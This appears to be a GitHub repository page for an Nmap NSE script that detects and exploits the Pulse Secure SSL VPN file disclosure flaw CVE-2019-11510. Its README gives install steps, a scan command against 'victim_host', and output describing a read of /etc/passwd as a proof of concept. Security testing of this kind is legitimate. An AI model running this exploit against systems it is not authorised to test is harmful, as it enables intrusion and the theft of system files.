-
Notifications
You must be signed in to change notification settings - Fork 9
r00tpgp/http-pulse_ssl_vpn.nse
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
SUMMARY ------- Simple NSE script to detect Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. This exploit reads /etc/passwd as a proof of concept This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4). INSTALLATION ------------ $ git clone https://github.com/r00tpgp/http-pulse_ssl_vpn.nse.git $ cd http-pulse_ssl_vpn.nse/ $ sudo cp http-pulse_ssl_vpn.nse /usr/share/nmap/scripts/ USAGE ----- $ sudo nmap -n -p 443 --script http-pulse_ssl_vpn -n victim_host PORT STATE SERVICE 443/tcp open https | http-pulse_ssl_vpn: | VULNERABLE: | Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests | State: VULNERABLE | IDs: CVE:CVE-2019-11510 | Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. | This exploit reads /etc/passwd as a proof of concept | This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 | | Disclosure date: 2019-04-24 | References: | http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html | http://www.securityfocus.com/bid/108073 |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510 Nmap done: 1 IP address (1 host up) scanned in 1.81 seconds
About
Nmap NSE script to detect Pulse Secure SSL VPN file disclosure CVE-2019-11510
Resources
Stars
Watchers
Forks
Releases
No releases published